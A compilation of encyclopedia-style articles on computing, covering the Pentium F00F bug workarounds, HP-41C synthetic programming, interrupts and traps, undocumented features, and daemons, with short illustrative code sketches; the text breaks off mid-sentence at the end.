Although a definite solution to this problem required some sort of hardware/firmware revision, there were workarounds proposed at the time[1] which prevented the exploitation of this issue to mount a denial-of-service attack on the affected machine. All of them were based on forcefully breaking up the pattern of faulty bus accesses responsible for the processor hang. Intel's proposed (and therefore "official") solutions required setting up the table of interrupt descriptors in an unnatural way that forced the processor to issue an intervening page fault before it could access the memory containing the descriptor for the undefined-opcode exception. These extraneous memory accesses turned out to be sufficient for the bus interface to let go of the locking requirement that was the root cause of the bug.
Specifically, the table of interrupt descriptors, which normally resides on a single memory page, is instead split over two pages such that the descriptors for the first seven exception handlers reside on one page, and the remainder of the table on the following page. The handler for the undefined-opcode exception is then the last descriptor on the first page, while the handler for the page-fault exception resides on the second page. The first page can now be made not-present (usually signifying a page that has been swapped out to disk to make room for some other data), which will force the processor to fetch the descriptor for the page-fault exception handler. This descriptor, residing on the second page of the table, is present in memory as usual (if it were not, the processor would double- and then triple-fault, leading to a shutdown). These extra memory cycles override the memory-locking requirement issued by the original illegal instruction (since faulting instructions are supposed to be able to be restarted after the exception handler returns). The handler for the page-fault exception has to be modified, however, to cope with the necessity of providing the missing page for the first half of the interrupt descriptor table, a task it is not usually required to perform.

The second official workaround from Intel proposed keeping all pages present in memory, but marking the first page read-only. Since the originating illegal instruction was supposed to issue a memory write cycle, this is enough to again force the intervention of the page-fault handler. This variant has the advantage that the modifications required to the page-fault handler are very minor compared to the ones required for the first variant; it basically just needs to redirect to the undefined-exception handler when appropriate. However, this variant requires that the operating system itself be prevented from writing to read-only pages (through the setting of a global processor flag), and not all kernels are designed this way; more recent kernels in fact are, since this is the same basic mechanism used for implementing copy-on-write.

Additional workarounds other than the official ones from Intel have been proposed; in many cases these proved as effective and much easier to implement.[1] The simplest one involved merely marking the page containing the interrupt descriptors as non-cacheable. Again, the extra memory cycles that the processor was forced to go through to fetch data from RAM every time it needed to invoke an exception handler appeared to be all that was needed to prevent the processor from locking up. In this case, no modification whatsoever to any exception handler was required. And, although not strictly necessary, the same split of the interrupt descriptor table was performed in this case, with only the first page marked non-cacheable. This was for performance reasons, as the page containing most of the descriptors (and, in fact, the ones more often required) could stay in the cache.

For unknown reasons, these additional, unofficial workarounds were never endorsed by Intel. It may be that they were suspected of not working with all affected processor versions.
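The address arithmetic behind the first official workaround can be sketched in C. This is a simplified model assuming i386 conventions: 8-byte gate descriptors, 4 KiB pages, the undefined-opcode exception at vector 6 and the page fault at vector 14:

  #include <stdint.h>

  #define PAGE_SIZE 4096u
  #define DESC_SIZE 8u    /* size of one i386 gate descriptor */

  /* Given a page-aligned address that will hold vectors 7..255, place
     the IDT base so that vectors 0..6 (ending with #UD, vector 6) fall
     at the very end of the preceding page. Marking that page not-present
     then forces a page fault, via the descriptor for vector 14 on the
     second page, before the locked descriptor read can occur. */
  uint32_t choose_idt_base(uint32_t second_page) {
      return second_page - 7u * DESC_SIZE;   /* 7 descriptors * 8 bytes */
  }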
https://en.wikipedia.org/wiki/Pentium_F00F_bug
Synthetic programming (SP) is an advanced technique for programming the HP-41C and Elektronika B3-34 calculators, which involves creating instructions (or combinations of instructions and operands) that cannot be obtained using the standard capabilities of the calculator.[1]

Some HP-41C instructions are coded in memory using multiple bytes. Some of these byte sequences correspond to instructions the calculator is able to execute, but they cannot be entered into program memory using conventional program entry methods (i.e., using the calculator as described in the user's manual). Synthetic programming uses a bug in the calculator firmware to enter such byte sequences as a sequence of other instructions, and then jumps partway into the first instruction, so that the calculator treats the tail of that instruction as the beginning of a new one. This technique was called the byte jumper or byte grabber.

It is not clear whether the creators of the HP-41 were aware of all these "black holes". HP did not officially support these techniques, but was probably intrigued by the strange operations; in some cases it allowed enthusiasts to experiment in its offices and helped to improve the technique.

Synthetic programming is also possible on the (original) HP-15C.[2][3]
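The byte-grabber idea, entering a byte stream in the middle of a multi-byte instruction so that it decodes as something new, can be illustrated with a generic toy decoder in C; the opcodes here are invented and are not HP-41 instruction codes:

  #include <stdio.h>

  /* Invented encoding: opcode 0xA2 takes one operand byte; every other
     opcode is a single byte. Decoding depends entirely on where we start. */
  static void decode(const unsigned char *code, int len, int start) {
      for (int pc = start; pc < len; ) {
          unsigned char op = code[pc];
          if (op == 0xA2) { printf("LOAD #%02X\n", code[pc + 1]); pc += 2; }
          else            { printf("OP %02X\n", op);              pc += 1; }
      }
  }

  int main(void) {
      const unsigned char code[] = { 0xA2, 0x77, 0x3C };
      decode(code, 3, 0);  /* normal entry:  LOAD #77, OP 3C */
      decode(code, 3, 1);  /* mid-instruction entry: OP 77, OP 3C */
      return 0;
  }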
https://en.wikipedia.org/wiki/Synthetic_programming
In digital computers, an interrupt (sometimes referred to as a trap)[1] is a request for the processor to interrupt currently executing code (when permitted), so that the event can be processed in a timely manner. If the request is accepted, the processor will suspend its current activities, save its state, and execute a function called an interrupt handler (or an interrupt service routine, ISR) to deal with the event. This interruption is often temporary, allowing the software to resume[a] normal activities after the interrupt handler finishes, although the interrupt could instead indicate a fatal error.[2]

Interrupts are commonly used by hardware devices to indicate electronic or physical state changes that require time-sensitive attention. Interrupts are also commonly used to implement computer multitasking and system calls, especially in real-time computing. Systems that use interrupts in these ways are said to be interrupt-driven.[3]

Hardware interrupts were introduced as an optimization, eliminating unproductive waiting time in polling loops, waiting for external events. The first system to use this approach was the DYSEAC, completed in 1954, although earlier systems provided error trap functions.[4]

The UNIVAC 1103A computer is generally credited with the earliest use of interrupts in 1953.[5][6] Earlier, on the UNIVAC I (1951), "Arithmetic overflow either triggered the execution of a two-instruction fix-up routine at address 0, or, at the programmer's option, caused the computer to stop." The IBM 650 (1954) incorporated the first occurrence of interrupt masking. The National Bureau of Standards DYSEAC (1954) was the first to use interrupts for I/O. The IBM 704 was the first to use interrupts for debugging, with a "transfer trap", which could invoke a special routine when a branch instruction was encountered. The MIT Lincoln Laboratory TX-2 system (1957) was the first to provide multiple levels of priority interrupts.[6]

Interrupt signals may be issued in response to hardware or software events. These are classified as hardware interrupts or software interrupts, respectively. For any particular processor, the number of interrupt types is limited by the architecture.

A hardware interrupt is a condition related to the state of the hardware that may be signaled by an external hardware device, e.g., an interrupt request (IRQ) line on a PC, or detected by devices embedded in processor logic (e.g., the CPU timer in IBM System/370), to communicate that the device needs attention from the operating system (OS)[7] or, if there is no OS, from the bare-metal program running on the CPU. Such external devices may be part of the computer (e.g., a disk controller) or they may be external peripherals. For example, pressing a keyboard key or moving a mouse plugged into a PS/2 port triggers hardware interrupts that cause the processor to read the keystroke or mouse position.

Hardware interrupts can arrive asynchronously with respect to the processor clock, and at any time during instruction execution. Consequently, all incoming hardware interrupt signals are conditioned by synchronizing them to the processor clock, and acted upon only at instruction execution boundaries.

In many systems, each device is associated with a particular IRQ signal. This makes it possible to quickly determine which hardware device is requesting service, and to expedite servicing of that device.
On some older systems, such as the 1964 CDC 3600,[8] all interrupts went to the same location, and the OS used a specialized instruction to determine the highest-priority outstanding unmasked interrupt. On contemporary systems, there is generally a distinct interrupt routine for each type of interrupt (or for each interrupt source), often implemented as one or more interrupt vector tables.

To mask an interrupt is to disable it, so it is deferred[b] or ignored[c] by the processor, while to unmask an interrupt is to enable it.[9]

Processors typically have an internal interrupt mask register,[d] which allows selective enabling[2] (and disabling) of hardware interrupts. Each interrupt signal is associated with a bit in the mask register. On some systems, the interrupt is enabled when the bit is set, and disabled when the bit is clear. On others, the reverse is true, and a set bit disables the interrupt. When the interrupt is disabled, the associated interrupt signal may be ignored by the processor, or it may remain pending. Signals which are affected by the mask are called maskable interrupts.

Some interrupt signals are not affected by the interrupt mask and therefore cannot be disabled; these are called non-maskable interrupts (NMIs). These indicate high-priority events which cannot be ignored under any circumstances, such as the timeout signal from a watchdog timer. With regard to SPARC, the non-maskable interrupt (NMI), despite having the highest priority among interrupts, can be prevented from occurring through the use of an interrupt mask.[10]

One failure mode is when the hardware does not generate the expected interrupt for a change in state, causing the operating system to wait indefinitely. Depending on the details, the failure might affect only a single process or might have global impact. Some operating systems have code specifically to deal with this. As an example, IBM Operating System/360 (OS/360) relies on a not-ready-to-ready device-end interrupt when a tape has been mounted on a tape drive, and will not read the tape label until that interrupt occurs or is simulated. IBM added code to OS/360 so that the VARY ONLINE command will simulate a device-end interrupt on the target device.

A spurious interrupt is a hardware interrupt for which no source can be found. The terms "phantom interrupt" or "ghost interrupt" may also be used to describe this phenomenon. Spurious interrupts tend to be a problem with a wired-OR interrupt circuit attached to a level-sensitive processor input. Such interrupts may be difficult to identify when a system misbehaves.

In a wired-OR circuit, parasitic capacitance charging/discharging through the interrupt line's bias resistor will cause a small delay before the processor recognizes that the interrupt source has been cleared. If the interrupting device is cleared too late in the interrupt service routine (ISR), there will not be enough time for the interrupt circuit to return to the quiescent state before the current instance of the ISR terminates. The result is that the processor will think another interrupt is pending, since the voltage at its interrupt request input will not be high or low enough to establish an unambiguous internal logic 1 or logic 0. The apparent interrupt will have no identifiable source, hence the "spurious" moniker.
A spurious interrupt may also be the result of electricalanomaliesdue to faulty circuit design, highnoiselevels,crosstalk, timing issues, or more rarely,device errata.[11] A spurious interrupt may result in system deadlock or other undefined operation if the ISR does not account for the possibility of such an interrupt occurring. As spurious interrupts are mostly a problem with wired-OR interrupt circuits, good programming practice in such systems is for the ISR to check all interrupt sources for activity and take no action (other than possibly logging the event) if none of the sources is interrupting. A software interrupt is requested by the processor itself upon executing particular instructions or when certain conditions are met. Every software interrupt signal is associated with a particular interrupt handler. A software interrupt may be intentionally caused by executing a specialinstructionwhich, by design, invokes an interrupt when executed.[e]Such instructions function similarly tosubroutine callsand are used for a variety of purposes, such as requesting operating system services and interacting withdevice drivers(e.g., to read or write storage media). Software interrupts may also be triggered by program execution errors or by thevirtual memorysystem. Typically, the operating systemkernelwill catch and handle such interrupts. Some interrupts are handled transparently to the program - for example, the normal resolution of apage faultis to make the required page accessible in physical memory. But in other cases such as asegmentation faultthe operating system executes a process callback. OnUnix-likeoperating systemsthis involves sending asignalsuch asSIGSEGV,SIGBUS,SIGILLorSIGFPE, which may either call a signal handler or execute a default action (terminating the program). On Windows the callback is made usingStructured Exception Handlingwith an exception code such as STATUS_ACCESS_VIOLATION or STATUS_INTEGER_DIVIDE_BY_ZERO.[12] In a kernelprocess, it is often the case that some types of software interrupts are not supposed to happen. If they occur nonetheless, anoperating system crashmay result. The termsinterrupt,trap,exception,fault, andabortare used to distinguish types of interrupts, although "there is no clear consensus as to the exact meaning of these terms".[13]The termtrapmay refer to any interrupt, to any software interrupt, to any synchronous software interrupt, or only to interrupts caused by instructions withtrapin their names. In some usages, the termtraprefers specifically to abreakpointintended to initiate acontext switchto amonitor programordebugger.[1]It may also refer to a synchronous interrupt caused by an exceptional condition (e.g.,division by zero,invalid memory access,illegal opcode),[13]although the termexceptionis more common for this. x86divides interrupts into (hardware)interruptsand softwareexceptions, and identifies three types of exceptions: faults, traps, and aborts.[14][15](Hardware) interrupts are interrupts triggered asynchronously by an I/O device, and allow the program to be restarted with no loss of continuity.[14]A fault is restartable as well but is tied to the synchronous execution of an instruction - the return address points to the faulting instruction. 
A trap is similar to a fault except that the return address points to the instruction to be executed after the trapping instruction;[16]one prominent use is to implementsystem calls.[15]An abort is used for severe errors, such as hardware errors and illegal values in system tables, and often[f]does not allow a restart of the program.[16] Armuses the termexceptionto refer to all types of interrupts,[17]and divides exceptions into (hardware)interrupts,aborts,reset, and exception-generating instructions. Aborts correspond to x86 exceptions and may be prefetch aborts (failed instruction fetches) or data aborts (failed data accesses), and may be synchronous or asynchronous. Asynchronous aborts may be precise or imprecise. MMU aborts (page faults) are synchronous.[18] RISC-Vuses interrupt as the overall term as well as for the external subset; internal interrupts are called exceptions. Each interrupt signal input is designed to be triggered by either a logic signal level or a particular signal edge (level transition). Level-sensitive inputs continuously request processor service so long as a particular (high or low) logic level is applied to the input. Edge-sensitive inputs react to signal edges: a particular (rising or falling) edge will cause a service request to be latched; the processor resets the latch when the interrupt handler executes. Alevel-triggered interruptis requested by holding the interrupt signal at its particular (high or low) activelogic level. A device invokes a level-triggered interrupt by driving the signal to and holding it at the active level. It negates the signal when the processor commands it to do so, typically after the device has been serviced. The processor samples the interrupt input signal during each instruction cycle. The processor will recognize the interrupt request if the signal is asserted when sampling occurs. Level-triggered inputs allow multiple devices to share a common interrupt signal via wired-OR connections. The processor polls to determine which devices are requesting service. After servicing a device, the processor may again poll and, if necessary, service other devices before exiting the ISR.  As previously described, a processor whose level-sensitive interrupt input is connected to a wired-OR circuit is susceptible to spurious interrupts, which should they occur, may causedeadlockor some other potentially-fatal system fault. Anedge-triggered interruptis an interrupt signaled by alevel transitionon the interrupt line, either a falling edge (high to low) or a rising edge (low to high). A device wishing to signal an interrupt drives a pulse onto the line and then releases the line to its inactive state. The important part of edge triggering is that the signal must transition to trigger the interrupt; for example, if the transition was high-low, there would only be one falling edge interrupt triggered, and the continued low level would not trigger a further interrupt. The signal must return to the high level and fall again in order to trigger a further interrupt. This contrasts with a level trigger where the low level would continue to create interrupts (if they are enabled) until the signal returns to its high level. Computers with edge-triggered interrupts may include aninterrupt registerthat retains the status of pending interrupts. Systems with interrupt registers generally have interrupt mask registers as well. 
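The mask and status registers just described reduce to per-line bit manipulation. A minimal sketch, assuming the convention in which a set bit enables the corresponding interrupt (the text notes that some hardware inverts this), and with a non-maskable interrupt modeled as bypassing the mask:

```python
# Sketch of an interrupt mask register: one bit per interrupt line.
# Convention assumed here: bit set = interrupt enabled (some hardware
# uses the opposite convention, where a set bit disables the line).

mask = 0b0000  # all maskable interrupts start disabled

def unmask(irq):
    """Enable an interrupt line by setting its bit."""
    global mask
    mask |= (1 << irq)

def mask_off(irq):
    """Disable an interrupt line; its requests are ignored or stay pending."""
    global mask
    mask &= ~(1 << irq)

def deliverable(irq, nmi=False):
    # A non-maskable interrupt (NMI) bypasses the mask entirely.
    return nmi or bool(mask & (1 << irq))

unmask(2)
print(deliverable(2))            # True  - line 2 is unmasked
print(deliverable(3))            # False - line 3 is masked
print(deliverable(3, nmi=True))  # True  - NMIs cannot be masked
```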
The processor samples the interrupt trigger signals or interrupt register during each instruction cycle, and will process the highest-priority enabled interrupt found. Regardless of the triggering method, the processor will begin interrupt processing at the next instruction boundary following a detected trigger, ensuring that instructions are never interrupted partway through and that the saved state corresponds to a well-defined point in the program. There are several different architectures for handling interrupts. In some, there is a single interrupt handler[19] that must scan for the highest-priority enabled interrupt. In others, there are separate interrupt handlers for separate interrupt types,[20] separate I/O channels or devices, or both.[21][22] Several interrupt causes may have the same interrupt type and thus the same interrupt handler, requiring the interrupt handler to determine the cause.[20] Interrupts may be fully handled in hardware by the CPU, or may be handled by both the CPU and another component such as a programmable interrupt controller or a southbridge. If an additional component is used, that component would be connected between the interrupting device and the processor's interrupt pin to multiplex several sources of interrupt onto the one or two CPU lines typically available. If implemented as part of the memory controller, interrupts are mapped into the system's memory address space.[citation needed] In systems on a chip (SoC) implementations, interrupts come from different blocks of the chip and are usually aggregated in an interrupt controller attached to one or several processors (in a multi-core system).[23] Multiple devices may share an edge-triggered interrupt line if they are designed to. The interrupt line must have a pull-down or pull-up resistor so that, when not actively driven, it settles to its inactive (default) state. Devices signal an interrupt by briefly driving the line to its non-default state, letting the line float (not actively driving it) when not signaling an interrupt. This type of connection is also referred to as open collector. The line then carries all the pulses generated by all the devices. (This is analogous to the pull cord on some buses and trolleys that any passenger can pull to signal the driver that they are requesting a stop.) However, interrupt pulses from different devices may merge if they occur close in time. To avoid losing interrupts the CPU must trigger on the trailing edge of the pulse (e.g. the rising edge if the line is pulled up and driven low). After detecting an interrupt the CPU must check all the devices for service requirements. Edge-triggered interrupts do not suffer the problems that level-triggered interrupts have with sharing. Service of a low-priority device can be postponed arbitrarily, while interrupts from high-priority devices continue to be received and get serviced. If there is a device that the CPU does not know how to service, which may raise spurious interrupts, it will not interfere with interrupt signaling of other devices. However, it is easy for an edge-triggered interrupt to be missed - for example, when interrupts are masked for a period - and unless there is some type of hardware latch that records the event it is impossible to recover. This problem caused many "lockups" in early computer hardware because the processor did not know it was expected to do something. More modern hardware often has one or more interrupt status registers that latch interrupt requests; well-written edge-driven interrupt handling code can check these registers to ensure no events are missed.
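The latching behavior of such a status register can be sketched as comparing the previous and current samples of the line: a detected edge sets a status bit that stays set until software acknowledges it. The following is illustrative only:

```python
# Sketch of edge-triggered input with a latching status register:
# a falling edge (1 -> 0) sets a status bit; a held-low level does not
# re-trigger, and the bit stays set until software acknowledges it.

status = 0          # latched pending-interrupt bits
prev_sample = 1     # the line idles high (pulled up)

def sample(line_level, bit=0):
    global status, prev_sample
    if prev_sample == 1 and line_level == 0:   # falling edge detected
        status |= (1 << bit)                    # latch the request
    prev_sample = line_level

def acknowledge(bit=0):
    global status
    status &= ~(1 << bit)

for level in [1, 0, 0, 0, 1]:   # one pulse: only the transition latches
    sample(level)
print(bin(status))  # 0b1 - one request latched despite the long low level
acknowledge()
print(bin(status))  # 0b0 - cleared once software acknowledges it
```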
The Industry Standard Architecture (ISA) bus uses edge-triggered interrupts, without mandating that devices be able to share IRQ lines, but all mainstream ISA motherboards include pull-up resistors on their IRQ lines, so well-behaved ISA devices sharing IRQ lines should just work fine. The parallel port also uses edge-triggered interrupts. Many older devices assume that they have exclusive use of IRQ lines, making it electrically unsafe to share them. Multiple devices may "share the same line" in three ways. The first is exclusive conduction (switching) or exclusive connection (to pins). The next is by bus, with all devices connected to the same line and listening: cards on a bus (e.g., the ISA bus) must know when they are to talk and when not to talk. Talking can be triggered in two ways: by accumulation latch or by logic gates. Logic gates expect a continual data flow that is monitored for key signals. Accumulators trigger only when the remote side excites the gate beyond a threshold, so no negotiated speed is required. Each has its speed-versus-distance advantages. A trigger, generally, is the method by which excitation is detected: rising edge, falling edge, or threshold (an oscilloscope, for example, can trigger on a wide variety of shapes and conditions). Triggering for software interrupts must be built into the software, both in the OS and in the application. A C application may carry a table of handler functions that both the application and the OS know of and use appropriately; this is unrelated to hardware. This should not be confused with hardware interrupts, which signal the CPU directly (although the CPU then dispatches to software from a table of functions, similarly to software interrupts). Multiple devices sharing an interrupt line (of any triggering style) all act as spurious interrupt sources with respect to each other. With many devices on one line, the workload in servicing interrupts grows in proportion to the number of devices. It is therefore preferred to spread devices evenly across the available interrupt lines. Shortage of interrupt lines is a problem in older system designs where the interrupt lines are distinct physical conductors. Message-signaled interrupts, where the interrupt line is virtual, are favored in new system architectures (such as PCI Express) and relieve this problem to a considerable extent. Some devices with a poorly designed programming interface provide no way to determine whether they have requested service. They may lock up or otherwise misbehave if serviced when they do not want it. Such devices cannot tolerate spurious interrupts, and so also cannot tolerate sharing an interrupt line. ISA cards, due to often cheap design and construction, are notorious for this problem. Such devices are becoming much rarer, as hardware logic becomes cheaper and new system architectures mandate shareable interrupts. Some systems use a hybrid of level-triggered and edge-triggered signaling. The hardware not only looks for an edge, but it also verifies that the interrupt signal stays active for a certain period of time. A common use of a hybrid interrupt is for the NMI (non-maskable interrupt) input. Because NMIs generally signal major – or even catastrophic – system events, a good implementation of this signal tries to ensure that the interrupt is valid by verifying that it remains active for a period of time. This two-step approach helps to eliminate false interrupts from affecting the system. A message-signaled interrupt does not use a physical interrupt line.
Instead, a device signals its request for service by sending a short message over some communications medium, typically acomputer bus. The message might be of a type reserved for interrupts, or it might be of some pre-existing type such as a memory write. Message-signalled interrupts behave very much like edge-triggered interrupts, in that the interrupt is a momentary signal rather than a continuous condition. Interrupt-handling software treats the two in much the same manner. Typically, multiple pending message-signaled interrupts with the same message (the same virtual interrupt line) are allowed to merge, just as closely spaced edge-triggered interrupts can merge. Message-signalledinterrupt vectorscan be shared, to the extent that the underlying communication medium can be shared. No additional effort is required. Because the identity of the interrupt is indicated by a pattern of data bits, not requiring a separate physical conductor, many more distinct interrupts can be efficiently handled. This reduces the need for sharing. Interrupt messages can also be passed over a serial bus, not requiring any additional lines. PCI Express, a serial computer bus, usesmessage-signaled interruptsexclusively. In apush buttonanalogy applied tocomputer systems, the termdoorbellordoorbell interruptis often used to describe a mechanism whereby asoftwaresystem can signal or notify acomputer hardwaredevice that there is some work to be done. Typically, the software system will place data in some well-known and mutually agreed upon memory locations, and "ring the doorbell" by writing to a different memory location. This different memory location is often called the doorbell region, and there may even be multiple doorbells serving different purposes in this region. It is this act of writing to the doorbell region of memory that "rings the bell" and notifies the hardware device that the data are ready and waiting. The hardware device would now know that the data are valid and can be acted upon. It would typically write the data to ahard disk drive, or send them over anetwork, orencryptthem, etc. The termdoorbell interruptis usually amisnomer. It is similar to an interrupt, because it causes some work to be done by the device; however, the doorbell region is sometimes implemented as apolledregion, sometimes the doorbell region writes through to physical deviceregisters, and sometimes the doorbell region is hardwired directly to physical device registers. When either writing through or directly to physical device registers, this may cause a real interrupt to occur at the device's central processor unit (CPU), if it has one. Doorbell interrupts can be compared toMessage Signaled Interrupts, as they have some similarities. Inmultiprocessorsystems, a processor may send an interrupt request to another processor viainter-processor interrupts[h](IPI). Interrupts provide low overhead and goodlatencyat low load, but degrade significantly at high interrupt rate unless care is taken to prevent several pathologies. The phenomenon where the overall system performance is severely hindered by excessive amounts of processing time spent handling interrupts is called aninterrupt storm. There are various forms oflivelocks, when the system spends all of its time processing interrupts to the exclusion of other required tasks. Under extreme conditions, a large number of interrupts (like very high network traffic) may completely stall the system. 
To avoid such problems, anoperating systemmust schedule network interrupt handling as carefully as it schedules process execution.[24] With multi-core processors, additional performance improvements in interrupt handling can be achieved throughreceive-side scaling(RSS) whenmultiqueue NICsare used. Such NICs provide multiple receivequeuesassociated to separate interrupts; by routing each of those interrupts to different cores, processing of the interrupt requests triggered by the network traffic received by a single NIC can be distributed among multiple cores. Distribution of the interrupts among cores can be performed automatically by the operating system, or the routing of interrupts (usually referred to asIRQ affinity) can be manually configured.[25][26] A purely software-based implementation of the receiving traffic distribution, known asreceive packet steering(RPS), distributes received traffic among cores later in the data path, as part of theinterrupt handlerfunctionality. Advantages of RPS over RSS include no requirements for specific hardware, more advanced traffic distribution filters, and reduced rate of interrupts produced by a NIC. As a downside, RPS increases the rate ofinter-processor interrupts(IPIs).Receive flow steering(RFS) takes the software-based approach further by accounting forapplication locality; further performance improvements are achieved by processing interrupt requests by the same cores on which particular network packets will be consumed by the targeted application.[25][27][28] Interrupts are commonly used to service hardware timers, transfer data to and from storage (e.g., disk I/O) and communication interfaces (e.g.,UART,Ethernet), handle keyboard and mouse events, and to respond to any other time-sensitive events as required by the application system. Non-maskable interrupts are typically used to respond to high-priority requests such as watchdog timer timeouts, power-down signals andtraps. Hardware timers are often used to generate periodic interrupts. In some applications, such interrupts are counted by the interrupt handler to keep track of absolute or elapsed time, or used by the OS taskschedulerto manage execution of runningprocesses, or both. Periodic interrupts are also commonly used to invoke sampling from input devices such asanalog-to-digital converters,incremental encoder interfaces, andGPIOinputs, and to program output devices such asdigital-to-analog converters,motor controllers, and GPIO outputs. A disk interrupt signals the completion of a data transfer from or to the disk peripheral; this may cause a process to run which is waiting to read or write. A power-off interrupt predicts imminent loss of power, allowing the computer to perform an orderly shut-down while there still remains enough power to do so. Keyboard interrupts typically causekeystrokesto be buffered so as to implementtypeahead. Interrupts are sometimes used to emulate instructions which are unimplemented on some computers in a product family.[29][30]For examplefloating pointinstructions may be implemented in hardware on some systems and emulated on lower-cost systems. In the latter case, execution of an unimplemented floating point instruction will cause an "illegal instruction" exception interrupt. The interrupt handler will implement the floating point function in software and then return to the interrupted program as if the hardware-implemented instruction had been executed.[31]This provides application software portability across the entire line. 
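Returning to IRQ affinity: on Linux, the manual routing of interrupts to cores described earlier is exposed through procfs, where writing a hexadecimal CPU bitmask to /proc/irq/&lt;n&gt;/smp_affinity restricts that interrupt to the chosen cores. A sketch follows; the IRQ number 24 is an arbitrary example, and writing the file requires root privileges:

```python
# Sketch: pin IRQ 24 (an arbitrary example number) to CPUs 0 and 1 on Linux.
# The smp_affinity file takes a hexadecimal bitmask of allowed CPUs;
# writing it requires root privileges, and the IRQ must actually exist.

irq = 24
cpu_mask = (1 << 0) | (1 << 1)   # CPUs 0 and 1 -> bitmask 0x3

with open(f"/proc/irq/{irq}/smp_affinity", "w") as f:
    f.write(f"{cpu_mask:x}")

# Reading the file back shows the mask currently in effect.
with open(f"/proc/irq/{irq}/smp_affinity") as f:
    print(f.read().strip())
```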
Interrupts are similar tosignals, the difference being that signals are used forinter-process communication(IPC), mediated by the kernel (possibly via system calls) and handled by processes, while interrupts are mediated by the processor and handled by thekernel. The kernel may pass an interrupt as a signal to the process that caused it (typical examples areSIGSEGV,SIGBUS,SIGILLandSIGFPE).
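A minimal Python illustration of the Unix signal mechanism just described, installing a handler that the kernel calls back when a signal is delivered. SIGTERM is used here because safely catching SIGSEGV from within Python is not generally possible; the example assumes a Unix-like system:

```python
import os
import signal

# Install a handler: the kernel will call back into the process
# asynchronously when the signal is delivered, much as described above.
def on_term(signum, frame):
    print(f"caught signal {signum}, cleaning up")

signal.signal(signal.SIGTERM, on_term)

# Default actions still apply to unhandled signals; e.g. an unhandled
# SIGSEGV or SIGFPE would terminate the process instead.
os.kill(os.getpid(), signal.SIGTERM)   # deliver the signal to ourselves
print("execution resumed after the handler returned")
```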
https://en.wikipedia.org/wiki/Trap_(computing)
Anundocumented featureis an unintended or undocumented hardware operation, for example anundocumented instruction, orsoftware featurefound incomputer hardwareandsoftwarethat is considered beneficial or useful. Sometimes thedocumentationis omitted through oversight, but undocumented features are sometimes not intended for use byend users, but left available for use by the vendor forsoftware supportand development. Also, some unintended operation of hardware or software that ends up being of utility to users is simply abug, flaw or quirk. Since the suppliers of the software usually consider thesoftware documentationto constitute a contract for the behavior of the software, undocumented features are generally left unsupported and may be removed or changed at will and without notice to the users. Undocumented or unsupported features are sometimes also called "not manufacturer supported" (NOMAS), a term coined byPPC Journalin the early 1980s.[1][2][3][4]Some user-reported defects are viewed bysoftware developersas working as expected, leading to the catchphrase "it's not a bug, it's a feature" (INABIAF) and its variations.[5] Undocumented instructions, known asillegal opcodes, on theMOS Technology 6502and its variants are sometimes used by programmers. These were removed in theWDC 65C02. Video gameanddemosceneprogrammers have taken advantage of the unintended operation of computers' hardware to produce new effects or optimizations.[citation needed] In 2019, researchers discovered that a manufacturer debugging mode, known as VISA, had an undocumented feature onIntelPlatform Controller Hubs(PCHs), chipsets included on most Intel-based motherboards, which makes the mode accessible with a normal motherboard.[6]Since the chipset hasdirect memory accessthis is problematic for security reasons. Undocumented features (for example, the ability to change theswitchcharacter inMS-DOS, usually to ahyphen) can be included forcompatibilitypurposes (in this case withUnixutilities) or for future-expansion reasons. However; if the software provider changes their software strategy to better align with the business, the absence of documentation makes it easier to justify the feature's removal. New versions of software might omit mention of old (possibly superseded) features in documentation but keep them implemented for users who've grown accustomed to them.[7] In some cases,software bugsare referred to by developers either jokingly or conveniently as undocumented features.[5][8]This usage may have been popularised in some of Microsoft's responses to bug reports for its firstWord for Windowsproduct,[9]but does not originate there. The oldest surviving reference onUsenetdates to 5 March 1984.[10]Between 1969 and 1972, Sandy Mathes, a systems programmer forPDP-8software atDigital Equipment Corporation(DEC) in Maynard, MA, used the terms "bug" and "feature" in her reporting of test results to distinguish between undocumented actions of delivered software products that wereunacceptableandtolerable, respectively. This usage may have been perpetuated.[11] Undocumented features themselves have become a major feature ofcomputer games. Developers often include variouscheatsand other special features ("easter eggs") that are not explained in the packaged material, but have become part of the "buzz" about the game on theInternetand among gamers. The undocumented features of foreign games are often elements that were notlocalizedfrom their native language. 
Closed sourceAPIscan also have undocumented functions that are not generally known. These are sometimes used to gain a commercial advantage over third-party software by providing additional information or better performance to the application provider.
https://en.wikipedia.org/wiki/Undocumented_feature
This glossary of computer hardware terms is a list of definitions of terms and concepts related to computer hardware, i.e. the physical and structural components of computers, architectural issues, and peripheral devices.
https://en.wikipedia.org/wiki/Glossary_of_computer_terms
Inmultitaskingcomputeroperating systems, adaemon(/ˈdiːmən/or/ˈdeɪmən/)[1]is acomputer programthat runs as abackground process, rather than being under the direct control of an interactive user. Traditionally, the process names of a daemon end with the letterd, for clarification that the process is in fact a daemon, and for differentiation between a daemon and a normal computer program. For example,syslogdis a daemon that implements system logging facility, andsshdis a daemon that serves incomingSSHconnections. In aUnixenvironment, theparent processof a daemon is often, but not always, theinitprocess. A daemon is usually created either by a processforkinga child process and then immediately exiting, thus causing init to adopt the child process, or by the init process directly launching the daemon. In addition, a daemon launched by forking and exiting typically must perform other operations, such as dissociating the process from any controllingterminal(tty). Such procedures are often implemented in various convenience routines such asdaemon(3)in Unix. Systems often start daemons atboottime that will respond to network requests, hardware activity, or other programs by performing some task. Daemons such ascronmay also perform defined tasks at scheduled times. The term was coined by the programmers atMIT's Project MAC. According toFernando J. Corbató, who worked onProject MACaround 1963, his team was the first to use the term daemon, inspired byMaxwell's demon, an imaginary agent in physics andthermodynamicsthat helped to sort molecules, stating, "We fancifully began to use the word daemon to describe background processes that worked tirelessly to perform system chores".[2]Unixsystems inherited this terminology. Maxwell's demon is consistent with Greek mythology's interpretation of adaemonas a supernatural being working in the background. In the general sense, daemon is an older form of the word "demon", from theGreekδαίμων. In theUnix System Administration HandbookEvi Nemethstates the following about daemons:[3] Many people equate the word "daemon" with the word "demon", implying some kind ofsatanicconnection between UNIX and theunderworld. This is an egregious misunderstanding. "Daemon" is actually a much older form of "demon"; daemons have no particular bias towards good or evil, but rather serve to help define a person's character or personality. Theancient Greeks' concept of a "personal daemon" was similar to the modern concept of a "guardian angel"—eudaemoniais the state of being helped or protected by a kindly spirit. As a rule, UNIX systems seem to be infested with both daemons and demons. In modern usage in the context of computer software, the worddaemonis pronounced/ˈdiːmən/DEE-mənor/ˈdeɪmən/DAY-mən.[1] Alternative terms fordaemonareservice(used in Windows, from Windows NT onwards, and later also in Linux),started task(IBMz/OS),[4]andghost job(XDSUTS). Sometimes the more general termserverorserver processis used, particularly for daemons that operate as part ofclient-server 